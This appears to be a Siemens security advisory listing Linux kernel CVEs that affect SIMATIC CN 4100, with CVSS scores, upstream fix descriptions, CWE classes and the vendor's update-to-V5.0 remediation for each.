Metrics: CVSS Version 3.1; Base Score 5.5; Base Severity MEDIUM; Vector String CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

CVE-2025-38347

In the Linux kernel, the following vulnerability has been resolved:

f2fs: fix to do sanity check on ino and xnid

syzbot reported a f2fs bug as below:

Let's dump and check metadata of corrupted inode, it shows its xattr_nid is the same to its i_ino.

  dump.f2fs -i 3 chaseyu.img.raw
  i_xattr_nid [0x 3 : 3]

So that, during mknod in the corrupted directory, it tries to get and lock inode page twice, result in deadlock.

- f2fs_mknod
 - f2fs_add_inline_entry
  - f2fs_get_inode_page --- lock dir's inode page
  - f2fs_init_acl
   - f2fs_acl_create(dir,..)
    - __f2fs_get_acl
     - f2fs_getxattr
      - lookup_all_xattrs
       - __get_node_page --- try to lock dir's inode page

In order to fix this, let's add sanity check on ino and xnid.
Affected Products: Siemens SIMATIC (Vendor: Siemens; Product Version: SIMATIC CN 4100; Product Status: known_affected)
Remediations: Vendor fix: Update to V5.0 or later version, https://support.industry.siemens.com/cs/ww/en/view/109814144/
Relevant CWE: CWE-20 Improper Input Validation
Metrics: CVSS Version 3.1; Base Score 5.5; Base Severity MEDIUM; Vector String CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

CVE-2025-38491

In the Linux kernel, the following vulnerability has been resolved:

mptcp: make fallback action and fallback decision atomic

Syzkaller reported the following splat:

---truncated---

Affected Products: Siemens SIMATIC (Vendor: Siemens; Product Version: SIMATIC CN 4100; Product Status: known_affected)
Remediations: Vendor fix: Update to V5.0 or later version, https://support.industry.siemens.com/cs/ww/en/view/109814144/
Relevant CWE: CWE-667 Improper Locking
Metrics: CVSS Version 3.1; Base Score 5.5; Base Severity MEDIUM; Vector String CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

CVE-2025-38502

In the Linux kernel, the following vulnerability has been resolved:

bpf: Fix oob access in cgroup local storage

Lonial reported that an out-of-bounds access in cgroup local storage can be crafted via tail calls. Given two programs each utilizing a cgroup local storage with a different value size, and one program doing a tail call into the other. The verifier will validate each of the individual programs just fine. However, in the runtime context the bpf_cg_run_ctx holds a bpf_prog_array_item which contains the BPF program as well as any cgroup local storage flavor the program uses. Helpers such as bpf_get_local_storage() pick this up from the runtime context:

  ctx = container_of(current->bpf_ctx, struct bpf_cg_run_ctx, run_ctx);
  storage = ctx->prog_item->cgroup_storage[stype];

  if (stype == BPF_CGROUP_STORAGE_SHARED)
    ptr = &READ_ONCE(storage->buf)->data[0];
  else
    ptr = this_cpu_ptr(storage->percpu_buf);

For the second program which was called from the originally attached one, this means bpf_get_local_storage() will pick up the former program's map, not its own. With mismatching sizes, this can result in an unintended out-of-bounds access.
To fix this issue, we need to extend bpf_map_owner with an array of storage_cookie[] to match on i) the exact maps from the original program if the second program was using bpf_get_local_storage(), or ii) allow the tail call combination if the second program was not using any of the cgroup local storage maps.

Affected Products: Siemens SIMATIC (Vendor: Siemens; Product Version: SIMATIC CN 4100; Product Status: known_affected)
Remediations: Vendor fix: Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/
Relevant CWE: CWE-125 Out-of-bounds Read
Metrics: CVSS Version 3.1; Base Score 4; Base Severity MEDIUM; Vector String CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

CVE-2025-38552
In the Linux kernel, the following vulnerability has been resolved:
mptcp: plug races between subflow fail and subflow creation

We have races similar to the one addressed by the previous patch between subflow failing and additional subflow creation. They are just harder to trigger.

The solution is similar. Use a separate flag to track the condition 'socket state prevent any additional subflow creation' protected by the fallback lock.

The socket fallback makes such flag true, and also receiving or sending an MP_FAIL option.

The field 'allow_infinite_fallback' is now always touched under the relevant lock, we can drop the ONCE annotation on write.
Affected Products: Siemens SIMATIC (Vendor: Siemens; Product Version: SIMATIC CN 4100; Product Status: known_affected)
Remediations: Vendor fix: Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/
Relevant CWE: CWE-20 Improper Input Validation
Metrics: CVSS Version 3.1; Base Score 5.3; Base Severity MEDIUM; Vector String CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:H

CVE-2025-38614
In the Linux kernel, the following vulnerability has been resolved:
eventpoll: Fix semi-unbounded recursion

Ensure that epoll instances can never form a graph deeper than EP_MAX_NESTS+1 links.

Currently, ep_loop_check_proc() ensures that the graph is loop-free and does some recursion depth checks, but those recursion depth checks don't limit the depth of the resulting tree for two reasons:

- They don't look upwards in the tree.
- If there are multiple downwards paths of different lengths, only one of the paths is actually considered for the depth check since commit 28d82dc1c4ed ("epoll: limit paths").

Essentially, the current recursion depth check in ep_loop_check_proc() just serves to prevent it from recursing too deeply while checking for loops.

A more thorough check is done in reverse_path_check() after the new graph edge has already been created; this checks, among other things, that no paths going upwards from any non-epoll file with a length of more than 5 edges exist. However, this check does not apply to non-epoll files.

As a result, it is possible to recurse to a depth of at least roughly 500, tested on v6.15. (I am unsure if deeper recursion is possible; and this may have changed with commit 8c44dac8add7 ("eventpoll: Fix priority inversion problem").)

To fix it:

1. In ep_loop_check_proc(), note the subtree depth of each visited node, and use subtree depths for the total depth calculation even when a subtree has already been visited.
2. Add ep_get_upwards_depth_proc() for similarly determining the maximum depth of an upwards walk.
3. In ep_loop_check(), use these values to limit the total path length between epoll nodes to EP_MAX_NESTS edges.

Affected Products: Siemens SIMATIC (Vendor: Siemens; Product Version: SIMATIC CN 4100; Product Status: known_affected)
Remediations: Vendor fix: Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/
Relevant CWE: CWE-674 Uncontrolled Recursion
Metrics: CVSS Version 3.1; Base Score 5.5; Base Severity MEDIUM; Vector String CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

CVE-2025-38670
In the Linux kernel, the following vulnerability has been resolved:
arm64/entry: Mask DAIF in cpu_switch_to(), call_on_irq_stack()

`cpu_switch_to()` and `call_on_irq_stack()` manipulate SP to change to different stacks along with the Shadow Call Stack if it is enabled. Those two stack changes cannot be done atomically and both functions can be interrupted by SErrors or Debug Exceptions which, though unlikely, is very much broken: if interrupted, we can end up with mismatched stacks and Shadow Call Stack leading to clobbered stacks.

In `cpu_switch_to()`, it can happen when SP_EL0 points to the new task, but x18 still points to the old task's SCS. When the interrupt handler tries to save the task's SCS pointer, it will save the old task SCS pointer (x18) into the new task struct (pointed to by SP_EL0), clobbering it.

In `call_on_irq_stack()`, it can happen when switching from the task stack to the IRQ stack and when switching back. In both cases, we can be interrupted when the SCS pointer points to the IRQ SCS, but SP points to the task stack. The nested interrupt handler pushes its return addresses on the IRQ SCS. It then detects that SP points to the task stack, calls `call_on_irq_stack()` and clobbers the task SCS pointer with the IRQ SCS pointer, which it will also use!

This leads to tasks returning to addresses on the wrong SCS, or even on the IRQ SCS, triggering kernel panics via CONFIG_VMAP_STACK or FPAC if enabled.
This is possible on a default config, but unlikely. However, when enabling CONFIG_ARM64_PSEUDO_NMI, DAIF is unmasked and instead the GIC is responsible for filtering what interrupts the CPU should receive based on priority. Given the goal of emulating NMIs, pseudo-NMIs can be received by the CPU even in `cpu_switch_to()` and `call_on_irq_stack()`, possibly *very* frequently depending on the system configuration and workload, leading to unpredictable kernel panics.

Completely mask DAIF in `cpu_switch_to()` and restore it when returning. Do the same in `call_on_irq_stack()`, but restore and mask around the branch. Mask DAIF even if CONFIG_SHADOW_CALL_STACK is not enabled for consistency of behaviour between all configurations.

Introduce and use an assembly macro for saving and masking DAIF, as the existing one saves but only masks IF.

Affected Products: Siemens SIMATIC (Vendor: Siemens; Product Version: SIMATIC CN 4100; Product Status: known_affected)
Remediations: Vendor fix: Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/
Relevant CWE: CWE-20 Improper Input Validation
Metrics: CVSS Version 3.1; Base Score 5.5; Base Severity MEDIUM; Vector String CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

CVE-2025-38676
In the Linux kernel, the following vulnerability has been resolved:
iommu/amd: Avoid stack buffer overflow from kernel cmdline

While the kernel command line is considered trusted in most environments, avoid writing 1 byte past the end of "acpiid" if the "str" argument is maximum length.
Affected Products: Siemens SIMATIC (Vendor: Siemens; Product Version: SIMATIC CN 4100; Product Status: known_affected)
Remediations: Vendor fix: Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/
Relevant CWE: CWE-805 Buffer Access with Incorrect Length Value
Metrics: CVSS Version 3.1; Base Score 6; Base Severity MEDIUM; Vector String CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:H

CVE-2025-38677
In the Linux kernel, the following vulnerability has been resolved:
f2fs: fix to avoid out-of-boundary access in dnode page

As Jiaming Zhang reported:

The root cause is in the corrupted image, there is a dnode has the same node id w/ its inode, so during f2fs_get_dnode_of_data(), it tries to access block address in dnode at offset 934, however it parses the dnode as inode node, so that get_dnode_addr() returns 360, then it tries to access page address from 360 + 934 * 4 = 4096 w/ 4 bytes.
To fix this issue, let's add sanity check for node id of all direct nodes during f2fs_get_dnode_of_data().

Affected Products: Siemens SIMATIC (Vendor: Siemens; Product Version: SIMATIC CN 4100; Product Status: known_affected)
Remediations: Vendor fix: Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/
Relevant CWE: CWE-20 Improper Input Validation
Metrics: CVSS Version 3.1; Base Score 5.5; Base Severity MEDIUM; Vector String CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

CVE-2025-38679
In the Linux kernel, the following vulnerability has been resolved:
media: venus: Fix OOB read due to missing payload bound check

Currently, the event_seq_changed() handler processes a variable number of properties sent by the firmware. The number of properties is indicated by the firmware and used to iterate over the payload. However, the payload size is not being validated against the actual message length.

This can lead to out-of-bounds memory access if the firmware provides a property count that exceeds the data available in the payload. Such a condition can result in kernel crashes or potential information leaks if memory beyond the buffer is accessed.

Fix this by properly validating the remaining size of the payload before each property access and updating bounds accordingly as properties are parsed.

This ensures that property parsing is safely bounded within the received message buffer and protects against malformed or malicious firmware behavior.
Affected Products: Siemens SIMATIC (Vendor: Siemens; Product Version: SIMATIC CN 4100; Product Status: known_affected)
Remediations: Vendor fix: Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/
Relevant CWE: CWE-20 Improper Input Validation
Metrics: CVSS Version 3.1; Base Score 5.5; Base Severity MEDIUM; Vector String CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

CVE-2025-38680
In the Linux kernel, the following vulnerability has been resolved:
media: uvcvideo: Fix 1-byte out-of-bounds read in uvc_parse_format()

The buffer length check before calling uvc_parse_format() only ensured that the buffer has at least 3 bytes (buflen > 2), but the function accesses buffer[3], requiring at least 4 bytes.

This can lead to an out-of-bounds read if the buffer has exactly 3 bytes.

Fix it by checking that the buffer has at least 4 bytes in uvc_parse_format().

Affected Products: Siemens SIMATIC (Vendor: Siemens; Product Version: SIMATIC CN 4100; Product Status: known_affected)
Remediations: Vendor fix: Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/
Relevant CWE: CWE-125 Out-of-bounds Read
Metrics: CVSS Version 3.1; Base Score 5.5; Base Severity MEDIUM; Vector String CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

CVE-2025-38681
In the Linux kernel, the following vulnerability has been resolved:
mm/ptdump: take the memory hotplug lock inside ptdump_walk_pgd()

Memory hot remove unmaps and tears down various kernel page table regions as required. The ptdump code can race with concurrent modifications of the kernel page tables. When leaf entries are modified concurrently, the dump code may log stale or inconsistent information for a VA range, but this is otherwise not harmful.

But when intermediate levels of kernel page table are freed, the dump code will continue to use memory that has been freed and potentially reallocated for another purpose.
In such cases, the ptdump code may dereference bogus addresses, leading to a number of potential problems.

To avoid the above mentioned race condition, platforms such as arm64, riscv and s390 take memory hotplug lock, while dumping kernel page table via the sysfs interface /sys/kernel/debug/kernel_page_tables.

Similar race condition exists while checking for pages that might have been marked W+X via /sys/kernel/debug/kernel_page_tables/check_wx_pages which in turn calls ptdump_check_wx(). Instead of solving this race condition again, let's just move the memory hotplug lock inside generic ptdump_check_wx() which will benefit both the scenarios.

Drop get_online_mems() and put_online_mems() combination from all existing platform ptdump code paths.

Affected Products: Siemens SIMATIC (Vendor: Siemens; Product Version: SIMATIC CN 4100; Product Status: known_affected)
Remediations: Vendor fix: Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/
Relevant CWE: CWE-366 Race Condition within a Thread
Metrics: CVSS Version 3.1; Base Score 6.5; Base Severity MEDIUM; Vector String CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:L/A:H

CVE-2025-38683
In the Linux kernel, the following vulnerability has been resolved:
hv_netvsc: Fix panic during namespace deletion with VF

The existing code moves the VF NIC to new namespace when NETDEV_REGISTER is received on netvsc NIC. During deletion of the namespace, default_device_exit_batch() >> default_device_exit_net() is called. When netvsc NIC is moved back and registered to the default namespace, it automatically brings VF NIC back to the default namespace.
This will cause the default_device_exit_net() >> for_each_netdev_safe loop unable to detect the list end, and hit NULL ptr:

To fix it, move the ns change to a workqueue, and take rtnl_lock to avoid changing the netdev list when default_device_exit_net() is
using it.

Affected Products: Siemens SIMATIC (Vendor: Siemens; Product Version: SIMATIC CN 4100; Product Status: known_affected)
Remediations: Vendor fix: Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/
Relevant CWE: CWE-820 Missing Synchronization
Metrics: CVSS Version 3.1; Base Score 5.2; Base Severity MEDIUM; Vector String CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:L/I:L/A:H

CVE-2025-38684
In the Linux kernel, the following vulnerability has been resolved:
net/sched: ets: use old 'nbands' while purging unused classes

Shuang reported sch_ets test-case [1] crashing in ets_class_qlen_notify() after recent changes from Lion [2]. The problem is: in ets_qdisc_change() we purge unused DWRR queues; the value of 'q->nbands' is the new one, and the cleanup should be done with the old one. The problem is here since my first attempts to fix ets_qdisc_change(), but it surfaced again after the recent qdisc len accounting fixes. Fix it purging idle DWRR queues before assigning a new value of 'q->nbands', so that all purge operations find a consistent configuration:

- old 'q->nbands' because it's needed by ets_class_find()
- old 'q->nstrict' because it's needed by ets_class_is_strict()

[1] https://lore.kernel.org/netdev/e08c7f4a6882f260011909a868311c6e9b54f3e4.1639153474.git.dcaratti@redhat.com/
[2] https://lore.kernel.org/netdev/d912cbd7-193b-4269-9857-525bee8bbb6a@gmail.com/

Affected Products: Siemens SIMATIC (Vendor: Siemens; Product Version: SIMATIC CN 4100; Product Status: known_affected)
Remediations: Vendor fix: Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/
Relevant CWE: CWE-476 NULL Pointer Dereference
Metrics: CVSS Version 3.1; Base Score 5.2; Base Severity MEDIUM; Vector String CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:L/I:L/A:H

CVE-2025-38685
In the Linux kernel, the following vulnerability has been resolved:
fbdev: Fix vmalloc out-of-bounds write in fast_imageblit

This issue triggers when a userspace program does an ioctl FBIOPUT_CON2FBMAP by passing console number and frame buffer number. Ideally this maps console to frame buffer and updates the screen if console is visible.

As part of mapping it has to do resize of console according to frame buffer info. If this resize fails and returns from vc_do_resize() and continues further. At this point console and new frame buffer are mapped and sets display vars. Despite failure still it continue to proceed updating the screen at later stages where vc_data is related to previous frame buffer and frame buffer info and display vars are mapped to new frame buffer and eventually leading to out-of-bounds write in fast_imageblit(). This behaviour is excepted only when fg_console is equal to requested console which is a visible console and updates screen with invalid struct references in fbcon_putcs().
Affected Products: Siemens SIMATIC (Vendor: Siemens; Product Version: SIMATIC CN 4100; Product Status: known_affected)
Remediations: Vendor fix: Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/
Relevant CWE: CWE-787 Out-of-bounds Write
Metrics: CVSS Version 3.1; Base Score 7.8; Base Severity HIGH; Vector String CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

CVE-2025-38687
In the Linux kernel, the following vulnerability has been resolved:
comedi: fix race between polling and detaching

syzbot reports a use-after-free in comedi in the below link, which is due to comedi gladly removing the allocated async area even though poll requests are still active on the wait_queue_head inside of it. This can cause a use-after-free when the poll entries are later triggered or removed, as the memory for the wait_queue_head has been freed. We need to check there are no tasks queued on any of the subdevices' wait queues before allowing the device to be detached by the `COMEDI_DEVCONFIG` ioctl.

Tasks will read-lock `dev->attach_lock` before adding themselves to the subdevice wait queue, so fix the problem in the `COMEDI_DEVCONFIG` ioctl handler by write-locking `dev->attach_lock` before checking that all of the subdevices are safe to be deleted. This includes testing for any sleepers on the subdevices' wait queues. It remains locked until the device has been detached. This requires the `comedi_device_detach()` function to be refactored slightly, moving the bulk of it into new function `comedi_device_detach_locked()`.

Note that the refactor of `comedi_device_detach()` results in `comedi_device_cancel_all()` now being called while `dev->attach_lock` is write-locked, which wasn't the case previously, but that does not matter.

Thanks to Jens Axboe for diagnosing the problem and co-developing this patch.
Affected Products: Siemens SIMATIC (Vendor: Siemens; Product Version: SIMATIC CN 4100; Product Status: known_affected)
Remediations: Vendor fix: Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/
Relevant CWE: CWE-20 Improper Input Validation
Metrics: CVSS Version 3.1; Base Score 5.5; Base Severity MEDIUM; Vector String CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

CVE-2025-38691
In the Linux kernel, the following vulnerability has been resolved:
pNFS: Fix uninited ptr deref in block/scsi layout

The error occurs on the third attempt to encode extents. When function ext_tree_prepare_commit() reallocates a larger buffer to retry encoding extents, the "layoutupdate_pages" page array is initialized only after the retry loop. But ext_tree_free_commitdata() is called on every iteration and tries to put pages in the array, thus dereferencing uninitialized pointers.

An additional problem is that there is no limit on the maximum possible buffer_size. When there are too many extents, the client may create a layoutcommit that is larger than the maximum possible RPC size accepted by the server.

During testing, we observed two typical scenarios. First, one memory page for extents is enough when we work with small files, append data to the end of the file, or preallocate extents before writing. But when we fill a new large file without preallocating, the number of extents can be huge, and counting the number of written extents in ext_tree_encode_commit() does not help much. Since this number increases even more between unlocking and locking of ext_tree, the reallocated buffer may not be large enough again and again.
Affected Products: Siemens SIMATIC (Vendor: Siemens; Product Version: SIMATIC CN 4100; Product Status: known_affected)
Remediations: Vendor fix: Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/
Relevant CWE: CWE-908 Use of Uninitialized Resource
Metrics: CVSS Version 3.1; Base Score 5.5; Base Severity MEDIUM; Vector String CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

CVE-2025-38693
In the Linux kernel, the following vulnerability has been resolved:
media: dvb-frontends: w7090p: fix null-ptr-deref in w7090p_tuner_write_serpar and w7090p_tuner_read_serpar

In w7090p_tuner_write_serpar, msg is controlled by user. When msg[0].buf is null and msg[0].len is zero, former checks on msg[0].buf would be passed. If accessing msg[0].buf[2] without sanity check, null pointer deref would happen. We add check on msg[0].len to prevent crash.

Similar commit: commit 0ed554fd769a ("media: dvb-usb: az6027: fix null-ptr-deref in az6027_i2c_xfer()")

Affected Products: Siemens SIMATIC (Vendor: Siemens; Product Version: SIMATIC CN 4100; Product Status: known_affected)
Remediations: Vendor fix: Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/
Relevant CWE: CWE-20 Improper Input Validation
Metrics: CVSS Version 3.1; Base Score 7; Base Severity HIGH; Vector String CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H

CVE-2025-38694
In the Linux kernel, the following vulnerability has been resolved:
media: dvb-frontends: dib7090p: fix null-ptr-deref in dib7090p_rw_on_apb()

In dib7090p_rw_on_apb, msg is controlled by user. When msg[0].buf is null and msg[0].len is zero, former checks on msg[0].buf would be passed. If accessing msg[0].buf[2] without sanity check, null pointer deref would happen. We add check on msg[0].len to prevent crash. Similar issue occurs when access msg[1].buf[0] and msg[1].buf[1].
Similar commit: commit 0ed554fd769a ("media: dvb-usb: az6027: fix null-ptr-deref in az6027_i2c_xfer()")

Affected Products: Siemens SIMATIC (Vendor: Siemens; Product Version: SIMATIC CN 4100; Product Status: known_affected)
Remediations: Vendor fix: Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/
Relevant CWE: CWE-476 NULL Pointer Dereference
Metrics: CVSS Version 3.1; Base Score 5.5; Base Severity MEDIUM; Vector String CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

CVE-2025-38695
In the Linux kernel, the following vulnerability has been resolved:
scsi: lpfc: Check for hdwq null ptr when cleaning up lpfc_vport structure

If a call to lpfc_sli4_read_rev() from lpfc_sli4_hba_setup() fails, the resultant cleanup routine lpfc_sli4_vport_delete_fcp_xri_aborted() may occur before sli4_hba.hdwqs are allocated. This may result in a null pointer dereference when attempting to take the abts_io_buf_list_lock for the first hardware queue. Fix by adding a null ptr check on phba->sli4_hba.hdwq and early return because this situation means there must have been an error during port initialization.

Affected Products: Siemens SIMATIC (Vendor: Siemens; Product Version: SIMATIC CN 4100; Product Status: known_affected)
Remediations: Vendor fix: Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/
Relevant CWE: CWE-476 NULL Pointer Dereference
Metrics: CVSS Version 3.1; Base Score 7; Base Severity HIGH; Vector String CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H

CVE-2025-38696
In the Linux kernel, the following vulnerability has been resolved:
MIPS: Don't crash in stack_top() for tasks without ABI or vDSO

Not all tasks have an ABI associated or vDSO mapped, for example kthreads never do. If such a task ever ends up calling stack_top(), it will dereference the NULL ABI pointer and crash.
This can for example happen when using kunit:

Only dereference the ABI point if it is set.

The GIC page is also included as it is specific to the vDSO. Also move the randomization adjustment into the same conditional.

Affected Products: Siemens SIMATIC (Vendor: Siemens; Product Version: SIMATIC CN 4100; Product Status: known_affected)
Remediations: Vendor fix: Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/
Relevant CWE: CWE-20 Improper Input Validation
Metrics: CVSS Version 3.1; Base Score 5.5; Base Severity MEDIUM; Vector String CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

CVE-2025-38697
In the Linux kernel, the following vulnerability has been resolved:
jfs: upper bound check of tree index in dbAllocAG

When computing the tree index in dbAllocAG, we never check if we are out of bounds relative to the size of the stree. This could happen in a scenario where the filesystem metadata are corrupted.

Affected Products: Siemens SIMATIC (Vendor: Siemens; Product Version: SIMATIC CN 4100; Product Status: known_affected)
Remediations: Vendor fix: Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/
Relevant CWE: CWE-20 Improper Input Validation
Metrics: CVSS Version 3.1; Base Score 7; Base Severity HIGH; Vector String CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H

CVE-2025-38698
In the Linux kernel, the following vulnerability has been resolved:
jfs: Regular file corruption check

The reproducer builds a corrupted file on disk with a negative i_size value. Add a check when opening this file to avoid subsequent operation failures.
Affected Products: Siemens SIMATIC; Vendor: Siemens; Product Version: SIMATIC CN 4100; Product Status: known_affected
Remediations: Vendor fix: Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/
Relevant CWE: CWE-20 Improper Input Validation
Metrics: CVSS Version 3.1; Base Score 7; Base Severity HIGH; Vector String CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H

CVE-2025-38699
In the Linux kernel, the following vulnerability has been resolved:
scsi: bfa: Double-free fix
When the bfad_im_probe() function fails during initialization, the memory pointed to by bfad->im is freed without setting bfad->im to NULL. Subsequently, during driver uninstallation, when the state machine enters the bfad_sm_stopping state and calls the bfad_im_probe_undo() function, it attempts to free the memory pointed to by bfad->im again, thereby triggering a double-free vulnerability. Set bfad->im to NULL if probing fails.
Affected Products: Siemens SIMATIC; Vendor: Siemens; Product Version: SIMATIC CN 4100; Product Status: known_affected
Remediations: Vendor fix: Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/
Relevant CWE: CWE-415 Double Free
Metrics: CVSS Version 3.1; Base Score 6.4; Base Severity MEDIUM; Vector String CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H

CVE-2025-38700
In the Linux kernel, the following vulnerability has been resolved:
scsi: libiscsi: Initialize iscsi_conn->dd_data only if memory is allocated
In case of an ib_fast_reg_mr allocation failure during iSER setup, the machine hits a panic because iscsi_conn->dd_data is initialized unconditionally, even when no memory is allocated (dd_size == 0). This leads to invalid pointer dereference during connection teardown. Fix by setting iscsi_conn->dd_data only if memory is actually allocated.
Panic trace:
------------
    iser: iser_create_fastreg_desc: Failed to allocate ib_fast_reg_mr err=-12
    iser: iser_alloc_rx_descriptors: failed allocating rx descriptors / data buffers
    BUG: unable to handle page fault for address: fffffffffffffff8
    RIP: 0010:swake_up_locked.part.5+0xa/0x40
    Call Trace:
    complete+0x31/0x40
    iscsi_iser_conn_stop+0x88/0xb0 [ib_iser]
    iscsi_stop_conn+0x66/0xc0 [scsi_transport_iscsi]
    iscsi_if_stop_conn+0x14a/0x150 [scsi_transport_iscsi]
    iscsi_if_rx+0x1135/0x1834 [scsi_transport_iscsi]
    ? netlink_lookup+0x12f/0x1b0
    ? netlink_deliver_tap+0x2c/0x200
    netlink_unicast+0x1ab/0x280
    netlink_sendmsg+0x257/0x4f0
    ? _copy_from_user+0x29/0x60
    sock_sendmsg+0x5f/0x70
Affected Products: Siemens SIMATIC; Vendor: Siemens; Product Version: SIMATIC CN 4100; Product Status: known_affected
Remediations: Vendor fix: Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/
Relevant CWE: CWE-20 Improper Input Validation
Metrics: CVSS Version 3.1; Base Score 7; Base Severity HIGH; Vector String CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H

CVE-2025-38701
In the Linux kernel, the following vulnerability has been resolved:
ext4: do not BUG when INLINE_DATA_FL lacks system.data xattr
A syzbot fuzzed image triggered a BUG_ON in ext4_update_inline_data() when an inode had the INLINE_DATA_FL flag set but was missing the system.data extended attribute. Since this can happen due to a maliciously fuzzed file system, we shouldn't BUG, but rather, report it as a corrupted file system. Add similar replacements of BUG_ON with EXT4_ERROR_INODE() in ext4_create_inline_data() and ext4_inline_data_truncate().
Affected Products: Siemens SIMATIC; Vendor: Siemens; Product Version: SIMATIC CN 4100; Product Status: known_affected
Remediations: Vendor fix: Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/
Relevant CWE: CWE-617 Reachable Assertion
Metrics: CVSS Version 3.1; Base Score 5.5; Base Severity MEDIUM; Vector String CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

CVE-2025-38702
In the Linux kernel, the following vulnerability has been resolved:
fbdev: fix potential buffer overflow in do_register_framebuffer()
The current implementation may lead to buffer overflow when:
1. Unregistration creates NULL gaps in registered_fb[]
2. All array slots become occupied despite num_registered_fb < FB_MAX
3. The registration loop exceeds array bounds
Add boundary check to prevent registered_fb[FB_MAX] access.
Affected Products: Siemens SIMATIC; Vendor: Siemens; Product Version: SIMATIC CN 4100; Product Status: known_affected
Remediations: Vendor fix: Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/
Relevant CWE: CWE-787 Out-of-bounds Write
Metrics: CVSS Version 3.1; Base Score 7.8; Base Severity HIGH; Vector String CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

CVE-2025-38706
In the Linux kernel, the following vulnerability has been resolved:
ASoC: core: Check for rtd == NULL in snd_soc_remove_pcm_runtime()
snd_soc_remove_pcm_runtime() might be called with rtd == NULL which will lead to null pointer dereference. This was reproduced with topology loading and marking a link as ignore due to missing hardware component on the system. On module removal the soc_tplg_remove_link() would call snd_soc_remove_pcm_runtime() with rtd == NULL since the link was ignored, no runtime was created.
Affected Products: Siemens SIMATIC; Vendor: Siemens; Product Version: SIMATIC CN 4100; Product Status: known_affected
Remediations: Vendor fix: Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/
Relevant CWE: CWE-476 NULL Pointer Dereference
Metrics: CVSS Version 3.1; Base Score 5.5; Base Severity MEDIUM; Vector String CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

CVE-2025-38707
In the Linux kernel, the following vulnerability has been resolved:
fs/ntfs3: Add sanity check for file name
The length of the file name should be smaller than the directory entry size.
Affected Products: Siemens SIMATIC; Vendor: Siemens; Product Version: SIMATIC CN 4100; Product Status: known_affected
Remediations: Vendor fix: Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/
Relevant CWE: CWE-20 Improper Input Validation
Metrics: CVSS Version 3.1; Base Score 5.5; Base Severity MEDIUM; Vector String CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

CVE-2025-38708
In the Linux kernel, the following vulnerability has been resolved:
drbd: add missing kref_get in handle_write_conflicts
With `two-primaries` enabled, DRBD tries to detect "concurrent" writes and handle write conflicts, so that even if you write to the same sector simultaneously on both nodes, they end up with the identical data once the writes are completed. In handling "superseded" writes, we forgot a kref_get, resulting in a premature drbd_destroy_device and use after free, and further to kernel crashes with symptoms.
